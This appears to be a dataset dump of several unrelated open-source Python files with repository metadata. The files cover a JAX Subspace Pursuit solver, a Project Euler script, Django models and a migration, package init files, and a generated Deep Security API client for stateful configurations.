src/cr/sparse/_src/pursuit/sp.py
|
carnot-shailesh/cr-sparse
|
989ebead8a8ac37ade643093e1caa31ae2a3eda1
|
[
"Apache-2.0"
] | 5
|
2021-11-21T21:01:11.000Z
|
2022-02-28T07:20:03.000Z
|
# Copyright 2021 CR.Sparse Development Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import jax.numpy as jnp
from jax import vmap, jit, lax
from .defs import RecoverySolution
from cr.sparse import largest_indices
def matrix_solve(Phi, y, K, max_iters=None, res_norm_rtol=1e-4):
    r"""Solves the sparse recovery problem :math:`y = \Phi x + e` using Subspace Pursuit for matrices

    Args:
        Phi: sensing/dictionary matrix of shape (M, N).
        y: measurement vector.
        K: sparsity level (number of atoms in the support).
        max_iters: iteration cap; defaults to M (number of measurements) when None.
        res_norm_rtol: relative residual-norm tolerance used as the stopping criterion.

    Returns:
        RecoverySolution: state after the lax.while_loop terminates.
    """
    ## Initialize some constants for the algorithm
    M, N = Phi.shape
    # squared norm of the signal
    y_norm_sqr = y.T @ y
    # stop once ||r||^2 falls below (res_norm_rtol * ||y||)^2
    max_r_norm_sqr = y_norm_sqr * (res_norm_rtol ** 2)
    if max_iters is None:
        max_iters = M
    def init():
        """State after the first (correlation-based) iteration."""
        # compute the correlations of atoms with signal y
        h = Phi.T @ y
        # Pick largest K indices [this is first iteration]
        I = largest_indices(h, K)
        # Pick corresponding atoms to form the K wide subdictionary
        Phi_I = Phi[:, I]
        # Solve least squares over the selected indices
        x_I, r_I_norms, rank_I, s_I = jnp.linalg.lstsq(Phi_I, y)
        # Compute new residual
        r = y - Phi_I @ x_I
        # Compute residual norm squared
        r_norm_sqr = r.T @ r
        # Assemble the algorithm state at the end of first iteration
        return RecoverySolution(x_I=x_I, I=I, r=r, r_norm_sqr=r_norm_sqr, iterations=1)
    def body(state):
        """One Subspace Pursuit refinement step (traced by lax.while_loop)."""
        # compute the correlations of dictionary atoms with the residual
        h = Phi.T @ state.r
        # Ignore the previously selected atoms
        h = h.at[state.I].set(0)
        # Pick largest K indices
        I_new = largest_indices(h, K)
        # Combine with previous K indices to form a set of 2K indices
        I_2k = jnp.hstack((state.I, I_new))
        # Pick corresponding atoms to form the 2K wide subdictionary
        Phi_2I = Phi[:, I_2k]
        # Solve least squares over the selected 2K indices
        x_p, r_p_norms, rank_p, s_p = jnp.linalg.lstsq(Phi_2I, y)
        # pick the K largest indices
        Ia = largest_indices(x_p, K)
        # Identify indices for corresponding atoms
        I = I_2k[Ia]
        # TODO consider how we can exploit the guess for x_I
        # # Corresponding non-zero entries in the sparse approximation
        # x_I = x_p[Ia]
        # Form the subdictionary of corresponding atoms
        Phi_I = Phi[:, I]
        # Solve least squares over the selected K indices
        x_I, r_I_norms, rank_I, s_I = jnp.linalg.lstsq(Phi_I, y)
        # Compute new residual
        r = y - Phi_I @ x_I
        # Compute residual norm squared
        r_norm_sqr = r.T @ r
        return RecoverySolution(x_I=x_I, I=I, r=r, r_norm_sqr=r_norm_sqr, iterations=state.iterations+1)
    def cond(state):
        """Continue while the residual is large and iterations remain."""
        # limit on residual norm
        a = state.r_norm_sqr > max_r_norm_sqr
        # limit on number of iterations
        b = state.iterations < max_iters
        c = jnp.logical_and(a, b)
        return c
    state = lax.while_loop(cond, body, init())
    return state
matrix_solve_jit = jit(matrix_solve, static_argnums=(2), static_argnames=("step_size", "max_iters", "res_norm_rtol"))
def operator_solve(Phi, y, K, max_iters=None, res_norm_rtol=1e-4):
    r"""Solves the sparse recovery problem :math:`y = \Phi x + e` using Subspace Pursuit for linear operators

    Args:
        Phi: linear operator exposing ``trans`` (adjoint application) and
            ``columns(I)`` (materialize the atoms at indices I).
        y: measurement vector.
        K: sparsity level (number of atoms in the support).
        max_iters: iteration cap; defaults to M (length of y) when None.
        res_norm_rtol: relative residual-norm tolerance used as the stopping criterion.

    Returns:
        RecoverySolution: state after the lax.while_loop terminates.
    """
    trans = Phi.trans
    ## Initialize some constants for the algorithm
    M = y.shape[0]
    # squared norm of the signal
    y_norm_sqr = y.T @ y
    # stop once ||r||^2 falls below (res_norm_rtol * ||y||)^2
    max_r_norm_sqr = y_norm_sqr * (res_norm_rtol ** 2)
    if max_iters is None:
        max_iters = M
    def init():
        """State after the first (correlation-based) iteration."""
        # compute the correlations of atoms with signal y
        h = trans(y)
        # Pick largest K indices [this is first iteration]
        I = largest_indices(h, K)
        # Pick corresponding atoms to form the K wide subdictionary
        Phi_I = Phi.columns(I)
        # Solve least squares over the selected indices
        x_I, r_I_norms, rank_I, s_I = jnp.linalg.lstsq(Phi_I, y)
        # Compute new residual
        r = y - Phi_I @ x_I
        # Compute residual norm squared
        r_norm_sqr = r.T @ r
        # Assemble the algorithm state at the end of first iteration
        return RecoverySolution(x_I=x_I, I=I, r=r, r_norm_sqr=r_norm_sqr, iterations=1)
    def body(state):
        """One Subspace Pursuit refinement step (traced by lax.while_loop)."""
        # compute the correlations of dictionary atoms with the residual
        h = trans(state.r)
        # Ignore the previously selected atoms
        h = h.at[state.I].set(0)
        # Pick largest K indices
        I_new = largest_indices(h, K)
        # Combine with previous K indices to form a set of 2K indices
        I_2k = jnp.hstack((state.I, I_new))
        # Pick corresponding atoms to form the 2K wide subdictionary
        Phi_2I = Phi.columns(I_2k)
        # Solve least squares over the selected 2K indices
        x_p, r_p_norms, rank_p, s_p = jnp.linalg.lstsq(Phi_2I, y)
        # pick the K largest indices
        Ia = largest_indices(x_p, K)
        # Identify indices for corresponding atoms
        I = I_2k[Ia]
        # TODO consider how we can exploit the guess for x_I
        # # Corresponding non-zero entries in the sparse approximation
        # x_I = x_p[Ia]
        # Form the subdictionary of corresponding atoms
        Phi_I = Phi.columns(I)
        # Solve least squares over the selected K indices
        x_I, r_I_norms, rank_I, s_I = jnp.linalg.lstsq(Phi_I, y)
        # Compute new residual
        r = y - Phi_I @ x_I
        # Compute residual norm squared
        r_norm_sqr = r.T @ r
        return RecoverySolution(x_I=x_I, I=I, r=r, r_norm_sqr=r_norm_sqr, iterations=state.iterations+1)
    def cond(state):
        """Continue while the residual is large and iterations remain."""
        # limit on residual norm
        a = state.r_norm_sqr > max_r_norm_sqr
        # limit on number of iterations
        b = state.iterations < max_iters
        c = jnp.logical_and(a, b)
        return c
    state = lax.while_loop(cond, body, init())
    return state
# JIT-compiled variant; the operator Phi (argument 0) and K (argument 2) are static.
# NOTE(review): static_argnames lists "step_size", which is not a parameter of
# operator_solve — confirm against the jax.jit API.
operator_solve_jit = jit(operator_solve, static_argnums=(0, 2), static_argnames=("step_size", "max_iters", "res_norm_rtol"))
# Default public entry point for this module.
solve = operator_solve_jit
| 37.855491
| 124
| 0.64758
| 1,025
| 6,549
| 3.96878
| 0.181463
| 0.037856
| 0.035398
| 0.017699
| 0.812684
| 0.812684
| 0.812684
| 0.79351
| 0.79351
| 0.79351
| 0
| 0.008414
| 0.274088
| 6,549
| 172
| 125
| 38.075581
| 0.847287
| 0.442968
| 0
| 0.769231
| 0
| 0
| 0.017372
| 0
| 0
| 0
| 0
| 0.011628
| 0
| 1
| 0.102564
| false
| 0
| 0.051282
| 0
| 0.25641
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fed1bf6c9fbcbc3b09508c88b29ec39d21f5f517
| 63
|
py
|
Python
|
problem_016.py
|
wurfkeks/project-euler
|
782c459546ae0d98ce20ce0bbcde3fed3adaab06
|
[
"Unlicense"
] | null | null | null |
problem_016.py
|
wurfkeks/project-euler
|
782c459546ae0d98ce20ce0bbcde3fed3adaab06
|
[
"Unlicense"
] | null | null | null |
problem_016.py
|
wurfkeks/project-euler
|
782c459546ae0d98ce20ce0bbcde3fed3adaab06
|
[
"Unlicense"
] | null | null | null |
# Project Euler problem 16: sum of the digits of 2**1000.
# Fix: the original was Python-2-only — `print b` is a SyntaxError under
# Python 3, and `a /= 10` becomes float true-division there, corrupting the
# digit extraction. `//=` and print() keep the behavior identical on Py2 ints
# and correct on Py3.
a = 2 ** 1000
b = 0
while a > 0:
    # peel off the least-significant digit and accumulate it
    b += a % 10
    a //= 10  # floor division keeps `a` an int
print(b)
| 9
| 15
| 0.444444
| 15
| 63
| 1.866667
| 0.533333
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.268293
| 0.349206
| 63
| 6
| 16
| 10.5
| 0.414634
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.166667
| 1
| 0
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
feef6a713f1ab0535e375a743efab2334bb93bce
| 2,690
|
py
|
Python
|
SPIWork/Server/NaiveScoreMS/apps/users/models.py
|
happylrd/buptsse-workbooks
|
0c98d5b475abdabd47bb9f406d32f60d49cddfa7
|
[
"MIT"
] | null | null | null |
SPIWork/Server/NaiveScoreMS/apps/users/models.py
|
happylrd/buptsse-workbooks
|
0c98d5b475abdabd47bb9f406d32f60d49cddfa7
|
[
"MIT"
] | null | null | null |
SPIWork/Server/NaiveScoreMS/apps/users/models.py
|
happylrd/buptsse-workbooks
|
0c98d5b475abdabd47bb9f406d32f60d49cddfa7
|
[
"MIT"
] | null | null | null |
# coding=utf-8
from __future__ import unicode_literals
from datetime import datetime
from django.db import models
from django.contrib.auth.models import AbstractUser
class Student(models.Model):
    """Student profile with its own credentials (not tied to Django auth).

    All ``verbose_name`` values are Chinese admin-display labels (runtime
    strings, left untouched).
    """
    username = models.CharField(max_length=30, unique=True, verbose_name='用户名')
    # NOTE(review): password is a plain CharField — any hashing must happen
    # elsewhere; confirm it is not stored in cleartext.
    password = models.CharField(max_length=128, verbose_name='密码')
    realname = models.CharField(max_length=10, verbose_name='姓名')
    mobile = models.CharField(max_length=11, null=True, blank=True, verbose_name='手机号')
    school = models.CharField(max_length=20, verbose_name='学院')
    major = models.CharField(max_length=30, verbose_name='专业')
    gender = models.CharField(max_length=6, choices=(('male', '男'), ('female', '女')), default='female',
                              verbose_name='性别')
    birthday = models.DateField(null=True, blank=True, verbose_name='生日')
    # Permission levels per the choices tuple: 0 '一般' (general), 1 '添加' (add), 2 '检查' (check).
    permission_type = models.IntegerField(choices=((0, '一般'), (1, '添加'), (2, '检查')), default=0, verbose_name='权限类型')
    # Callable default: evaluated at save time, not at class-definition time.
    add_time = models.DateTimeField(default=datetime.now, verbose_name='添加时间')

    class Meta:
        verbose_name = '学生信息'
        verbose_name_plural = verbose_name

    def __unicode__(self):
        # Python 2-style representation (module imports unicode_literals).
        return self.username
class Teacher(models.Model):
    """Teacher profile; mirrors Student minus ``major``/``permission_type``."""
    username = models.CharField(max_length=30, unique=True, verbose_name='用户名')
    # NOTE(review): plain CharField password — same hashing concern as Student.
    password = models.CharField(max_length=128, verbose_name='密码')
    realname = models.CharField(max_length=10, verbose_name='姓名')
    mobile = models.CharField(max_length=11, null=True, blank=True, verbose_name='手机号')
    school = models.CharField(max_length=20, verbose_name='学院')
    gender = models.CharField(max_length=6, choices=(('male', '男'), ('female', '女')), default='female',
                              verbose_name='性别')
    birthday = models.DateField(null=True, blank=True, verbose_name='生日')
    # Callable default: evaluated at save time.
    add_time = models.DateTimeField(default=datetime.now, verbose_name='添加时间')

    class Meta:
        verbose_name = '教师信息'
        verbose_name_plural = verbose_name

    def __unicode__(self):
        # Python 2-style representation (module imports unicode_literals).
        return self.username
class Administrator(AbstractUser):
    """Admin account extending Django's AbstractUser (username/password inherited)."""
    realname = models.CharField(max_length=10, verbose_name='姓名')
    mobile = models.CharField(max_length=11, null=True, blank=True, verbose_name='手机号')
    gender = models.CharField(max_length=6, choices=(('male', '男'), ('female', '女')), default='female',
                              verbose_name='性别')
    birthday = models.DateField(null=True, blank=True, verbose_name='生日')
    # Callable default: evaluated at save time.
    add_time = models.DateTimeField(default=datetime.now, verbose_name='添加时间')

    class Meta:
        verbose_name = '管理员信息'
        verbose_name_plural = verbose_name

    def __unicode__(self):
        # self.username is inherited from AbstractUser.
        return self.username
| 42.698413
| 116
| 0.686989
| 340
| 2,690
| 5.223529
| 0.238235
| 0.198198
| 0.162162
| 0.216216
| 0.841216
| 0.826577
| 0.826577
| 0.826577
| 0.826577
| 0.826577
| 0
| 0.016253
| 0.17658
| 2,690
| 62
| 117
| 43.387097
| 0.785553
| 0.004461
| 0
| 0.75
| 0
| 0
| 0.049327
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0.041667
| 0.083333
| 0.0625
| 0.8125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
feefcdbeee0c0675cc4ee42d7110ffbb2e893480
| 1,391
|
py
|
Python
|
Questionnaire/migrations/0002_auto_20200720_1100.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
Questionnaire/migrations/0002_auto_20200720_1100.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
Questionnaire/migrations/0002_auto_20200720_1100.py
|
AdityaKapoor74/Supervised_Categorization_Study
|
1ce29de95c8ccc2b848e2d06463719858e57b942
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.0.2 on 2020-07-20 11:00
from django.db import migrations
class Migration(migrations.Migration):
    """Drop the obsolete ``time_taken`` field from all nine response models."""

    dependencies = [
        ('Questionnaire', '0001_initial'),
    ]

    # Identical operations to the original hand-written list of nine
    # RemoveField entries, generated from the model names in the same order.
    operations = [
        migrations.RemoveField(model_name=response_model, name='time_taken')
        for response_model in (
            'userresponse_common_features_test_set1',
            'userresponse_common_features_test_set2',
            'userresponse_common_features_test_set3',
            'userresponse_common_features_test_set4',
            'userresponse_test_set1',
            'userresponse_test_set2',
            'userresponse_test_set3',
            'userresponse_test_set4',
            'userresponse_test_set5',
        )
    ]
| 27.82
| 64
| 0.581596
| 124
| 1,391
| 6.16129
| 0.290323
| 0.247382
| 0.306283
| 0.353403
| 0.793194
| 0.793194
| 0.793194
| 0.793194
| 0.719895
| 0.719895
| 0
| 0.029724
| 0.322789
| 1,391
| 49
| 65
| 28.387755
| 0.781316
| 0.032351
| 0
| 0.627907
| 1
| 0
| 0.280506
| 0.19494
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.023256
| 0
| 0.093023
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
28c4185407075760c300d3e5130965f9191c1183
| 450
|
py
|
Python
|
asreview/entry_points/__init__.py
|
J535D165/asreview
|
eda3c52a595d739093c3cd6cd37d41eeed6dd15c
|
[
"Apache-2.0"
] | null | null | null |
asreview/entry_points/__init__.py
|
J535D165/asreview
|
eda3c52a595d739093c3cd6cd37d41eeed6dd15c
|
[
"Apache-2.0"
] | null | null | null |
asreview/entry_points/__init__.py
|
J535D165/asreview
|
eda3c52a595d739093c3cd6cd37d41eeed6dd15c
|
[
"Apache-2.0"
] | null | null | null |
"""Default entry points for asreview."""
# NOTE: the docstring must be the first statement in the module; in the
# previous revision it came after the imports, so module.__doc__ was None.
from asreview.entry_points.algorithms import AlgorithmsEntryPoint
from asreview.entry_points.base import BaseEntryPoint
from asreview.entry_points.lab import LABEntryPoint
from asreview.entry_points.lab import OracleEntryPoint
from asreview.entry_points.lab import WebRunModelEntryPoint
from asreview.entry_points.simulate import BatchEntryPoint
from asreview.entry_points.simulate import SimulateEntryPoint
| 45
| 65
| 0.877778
| 54
| 450
| 7.185185
| 0.333333
| 0.226804
| 0.306701
| 0.414948
| 0.438144
| 0.438144
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075556
| 450
| 9
| 66
| 50
| 0.932692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
28eea53e87ee57c71562b671f25291e2db9bc259
| 32,287
|
py
|
Python
|
source/deepsecurity/api/stateful_configurations_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:09.000Z
|
2021-10-30T16:40:09.000Z
|
source/deepsecurity/api/stateful_configurations_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-07-28T20:19:03.000Z
|
2021-07-28T20:19:03.000Z
|
source/deepsecurity/api/stateful_configurations_api.py
|
felipecosta09/cloudone-workload-controltower-lifecycle
|
7927c84d164058b034fc872701b5ee117641f4d1
|
[
"Apache-2.0"
] | 1
|
2021-10-30T16:40:02.000Z
|
2021-10-30T16:40:02.000Z
|
# coding: utf-8
"""
Trend Micro Deep Security API
Copyright 2018 - 2020 Trend Micro Incorporated.<br/>Get protected, stay secured, and keep informed with Trend Micro Deep Security's new RESTful API. Access system data and manage security configurations to automate your security workflows and integrate Deep Security into your CI/CD pipeline. # noqa: E501
OpenAPI spec version: 12.5.841
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from deepsecurity.api_client import ApiClient
class StatefulConfigurationsApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Hand-refactored: the six endpoint pairs shared one identical
    request-building sequence, now centralised in :meth:`_invoke`.
    All public method signatures, error messages and request contents
    are unchanged.

    Ref: https://github.com/swagger-api/swagger-codegen
    """

    # Keyword arguments accepted by every *_with_http_info method in
    # addition to the endpoint-specific parameters.
    _COMMON_PARAMS = ('async_req', '_return_http_data_only',
                      '_preload_content', '_request_timeout')

    def __init__(self, api_client=None):
        # Fall back to a default client so the API object is usable standalone.
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def _invoke(self, caller, path, http_method, params, known, required,
                id_param=None, body_param=None, response_type=None):
        """Validate *params* and issue the HTTP request shared by all endpoints.

        :param str caller: public method name, used verbatim in error messages.
        :param str path: resource path template.
        :param str http_method: HTTP verb ('GET', 'POST', 'DELETE').
        :param dict params: positional parameters plus a 'kwargs' dict.
        :param list known: endpoint-specific parameter names.
        :param list required: names that must be present and not None,
            checked in order (order matters for which error fires first).
        :param str id_param: name of the numeric path parameter, if any.
        :param str body_param: name of the parameter sent as the request body.
        :param str response_type: swagger model name of the response, or None.
        :return: whatever ``api_client.call_api`` returns.
        :raises TypeError: on an unexpected keyword argument.
        :raises ValueError: on a missing required parameter or an ID that
            does not match the swagger pattern ``/\\d+/``.
        """
        kwargs = params.pop('kwargs')
        # six.iteritems dropped deliberately: dict.items() is correct on
        # both Python 2 and Python 3.
        for key, val in kwargs.items():
            if key not in known and key not in self._COMMON_PARAMS:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method %s" % (key, caller)
                )
            params[key] = val
        for name in required:
            if name not in params or params[name] is None:
                raise ValueError(
                    "Missing the required parameter `%s` when calling `%s`"
                    % (name, caller))
        path_params = {}
        if id_param is not None and id_param in params:
            # Swagger declares the ID path parameter with pattern /\d+/.
            if not re.search('\\d+', str(params[id_param])):
                raise ValueError(
                    "Invalid value for parameter `%s` when calling `%s`,"
                    " must conform to the pattern `/\\d+/`"
                    % (id_param, caller))
            path_params['statefulConfigurationID'] = params[id_param]
        header_params = {}
        if 'api_version' in params:
            header_params['api-version'] = params['api_version']
        body_params = None
        if body_param is not None and body_param in params:
            body_params = params[body_param]
        # HTTP headers `Accept` and `Content-Type`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])
        header_params['Content-Type'] = self.api_client.select_header_content_type(
            ['application/json'])
        return self.api_client.call_api(
            path, http_method,
            path_params,
            [],  # query_params: none of these endpoints use any
            header_params,
            body=body_params,
            post_params=[],
            files={},
            response_type=response_type,
            auth_settings=['DefaultAuthentication'],
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats={})

    def create_stateful_configuration(self, stateful_configurations, api_version, **kwargs):  # noqa: E501
        """Create a Stateful Configuration.

        Create a new stateful configuration. Synchronous by default; pass
        ``async_req=True`` to get a request thread instead of the result.

        :param async_req bool
        :param StatefulConfiguration stateful_configurations: The settings of the new stateful configuration. (required)
        :param str api_version: The version of the api being called. (required)
        :return: StatefulConfiguration
        """
        # Both sync and async paths return the _with_http_info result directly.
        kwargs['_return_http_data_only'] = True
        return self.create_stateful_configuration_with_http_info(
            stateful_configurations, api_version, **kwargs)  # noqa: E501

    def create_stateful_configuration_with_http_info(self, stateful_configurations, api_version, **kwargs):  # noqa: E501
        """Create a Stateful Configuration (full HTTP info variant)."""
        return self._invoke(
            'create_stateful_configuration',
            '/statefulconfigurations', 'POST',
            {'stateful_configurations': stateful_configurations,
             'api_version': api_version, 'kwargs': kwargs},
            known=['stateful_configurations', 'api_version'],
            required=['stateful_configurations', 'api_version'],
            body_param='stateful_configurations',
            response_type='StatefulConfiguration')

    def delete_stateful_configuration(self, stateful_configuration_id, api_version, **kwargs):  # noqa: E501
        """Delete a Stateful Configuration.

        Delete a stateful configuration by ID. Synchronous by default; pass
        ``async_req=True`` to get a request thread instead of the result.

        :param async_req bool
        :param int stateful_configuration_id: The ID number of the stateful configuration to delete. (required)
        :param str api_version: The version of the api being called. (required)
        :return: None
        """
        kwargs['_return_http_data_only'] = True
        return self.delete_stateful_configuration_with_http_info(
            stateful_configuration_id, api_version, **kwargs)  # noqa: E501

    def delete_stateful_configuration_with_http_info(self, stateful_configuration_id, api_version, **kwargs):  # noqa: E501
        """Delete a Stateful Configuration (full HTTP info variant)."""
        return self._invoke(
            'delete_stateful_configuration',
            '/statefulconfigurations/{statefulConfigurationID}', 'DELETE',
            {'stateful_configuration_id': stateful_configuration_id,
             'api_version': api_version, 'kwargs': kwargs},
            known=['stateful_configuration_id', 'api_version'],
            required=['stateful_configuration_id', 'api_version'],
            id_param='stateful_configuration_id',
            response_type=None)

    def describe_stateful_configuration(self, stateful_configuration_id, api_version, **kwargs):  # noqa: E501
        """Describe a Stateful Configuration.

        Describe a stateful configuration by ID. Synchronous by default; pass
        ``async_req=True`` to get a request thread instead of the result.

        :param async_req bool
        :param int stateful_configuration_id: The ID number of the stateful configuration to describe. (required)
        :param str api_version: The version of the api being called. (required)
        :return: StatefulConfiguration
        """
        kwargs['_return_http_data_only'] = True
        return self.describe_stateful_configuration_with_http_info(
            stateful_configuration_id, api_version, **kwargs)  # noqa: E501

    def describe_stateful_configuration_with_http_info(self, stateful_configuration_id, api_version, **kwargs):  # noqa: E501
        """Describe a Stateful Configuration (full HTTP info variant)."""
        return self._invoke(
            'describe_stateful_configuration',
            '/statefulconfigurations/{statefulConfigurationID}', 'GET',
            {'stateful_configuration_id': stateful_configuration_id,
             'api_version': api_version, 'kwargs': kwargs},
            known=['stateful_configuration_id', 'api_version'],
            required=['stateful_configuration_id', 'api_version'],
            id_param='stateful_configuration_id',
            response_type='StatefulConfiguration')

    def list_stateful_configurations(self, api_version, **kwargs):  # noqa: E501
        """List Stateful Configurations.

        Lists all stateful configurations. Synchronous by default; pass
        ``async_req=True`` to get a request thread instead of the result.

        :param async_req bool
        :param str api_version: The version of the api being called. (required)
        :return: StatefulConfigurations
        """
        kwargs['_return_http_data_only'] = True
        return self.list_stateful_configurations_with_http_info(
            api_version, **kwargs)  # noqa: E501

    def list_stateful_configurations_with_http_info(self, api_version, **kwargs):  # noqa: E501
        """List Stateful Configurations (full HTTP info variant)."""
        return self._invoke(
            'list_stateful_configurations',
            '/statefulconfigurations', 'GET',
            {'api_version': api_version, 'kwargs': kwargs},
            known=['api_version'],
            required=['api_version'],
            response_type='StatefulConfigurations')

    def modify_stateful_configuration(self, stateful_configuration_id, stateful_configuration, api_version, **kwargs):  # noqa: E501
        """Modify a Stateful Configuration.

        Modify a stateful configuration by ID. Any unset elements will be
        left unchanged. Synchronous by default; pass ``async_req=True`` to
        get a request thread instead of the result.

        :param async_req bool
        :param int stateful_configuration_id: The ID number of the stateful configuration to modify. (required)
        :param StatefulConfiguration stateful_configuration: The settings of the stateful configuration to modify. (required)
        :param str api_version: The version of the api being called. (required)
        :return: StatefulConfiguration
        """
        kwargs['_return_http_data_only'] = True
        return self.modify_stateful_configuration_with_http_info(
            stateful_configuration_id, stateful_configuration,
            api_version, **kwargs)  # noqa: E501

    def modify_stateful_configuration_with_http_info(self, stateful_configuration_id, stateful_configuration, api_version, **kwargs):  # noqa: E501
        """Modify a Stateful Configuration (full HTTP info variant)."""
        return self._invoke(
            'modify_stateful_configuration',
            '/statefulconfigurations/{statefulConfigurationID}', 'POST',
            {'stateful_configuration_id': stateful_configuration_id,
             'stateful_configuration': stateful_configuration,
             'api_version': api_version, 'kwargs': kwargs},
            known=['stateful_configuration_id', 'stateful_configuration',
                   'api_version'],
            # Order preserved from the generated code so the same missing
            # parameter is reported first.
            required=['stateful_configuration_id', 'stateful_configuration',
                      'api_version'],
            id_param='stateful_configuration_id',
            body_param='stateful_configuration',
            response_type='StatefulConfiguration')

    def search_stateful_configurations(self, api_version, **kwargs):  # noqa: E501
        """Search Stateful Configurations.

        Search for stateful configurations using optional filters.
        Synchronous by default; pass ``async_req=True`` to get a request
        thread instead of the result.

        :param async_req bool
        :param str api_version: The version of the api being called. (required)
        :param SearchFilter search_filter: A collection of options used to filter the search results.
        :return: StatefulConfigurations
        """
        kwargs['_return_http_data_only'] = True
        return self.search_stateful_configurations_with_http_info(
            api_version, **kwargs)  # noqa: E501

    def search_stateful_configurations_with_http_info(self, api_version, **kwargs):  # noqa: E501
        """Search Stateful Configurations (full HTTP info variant)."""
        return self._invoke(
            'search_stateful_configurations',
            '/statefulconfigurations/search', 'POST',
            {'api_version': api_version, 'kwargs': kwargs},
            known=['api_version', 'search_filter'],
            required=['api_version'],
            body_param='search_filter',
            response_type='StatefulConfigurations')
| 47.55081
| 311
| 0.641311
| 3,531
| 32,287
| 5.607477
| 0.058624
| 0.143182
| 0.062727
| 0.024242
| 0.953636
| 0.949091
| 0.940556
| 0.928737
| 0.924394
| 0.918182
| 0
| 0.015163
| 0.278936
| 32,287
| 678
| 312
| 47.620944
| 0.835316
| 0.33481
| 0
| 0.781421
| 0
| 0
| 0.257573
| 0.128838
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035519
| false
| 0
| 0.010929
| 0
| 0.098361
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3a9e4992e042a97847f613df548a5782a3276fc9
| 137
|
py
|
Python
|
catalyst/contrib/models/nlp/__init__.py
|
and-kul/catalyst
|
51428d7756e62b9b8ee5379f38e9fd576eeb36e5
|
[
"Apache-2.0"
] | 2
|
2019-04-19T21:34:31.000Z
|
2019-05-02T22:50:25.000Z
|
catalyst/contrib/models/nlp/__init__.py
|
and-kul/catalyst
|
51428d7756e62b9b8ee5379f38e9fd576eeb36e5
|
[
"Apache-2.0"
] | 1
|
2021-01-07T16:13:45.000Z
|
2021-01-21T09:27:54.000Z
|
catalyst/contrib/models/nlp/__init__.py
|
and-kul/catalyst
|
51428d7756e62b9b8ee5379f38e9fd576eeb36e5
|
[
"Apache-2.0"
] | 1
|
2020-12-02T18:42:31.000Z
|
2020-12-02T18:42:31.000Z
|
# flake8: noqa
from catalyst.contrib.models.nlp.encoders import *
from catalyst.contrib.models.nlp.classification import BertClassifier
| 27.4
| 69
| 0.832117
| 17
| 137
| 6.705882
| 0.647059
| 0.210526
| 0.333333
| 0.438596
| 0.491228
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008
| 0.087591
| 137
| 4
| 70
| 34.25
| 0.904
| 0.087591
| 0
| 0
| 0
| 0
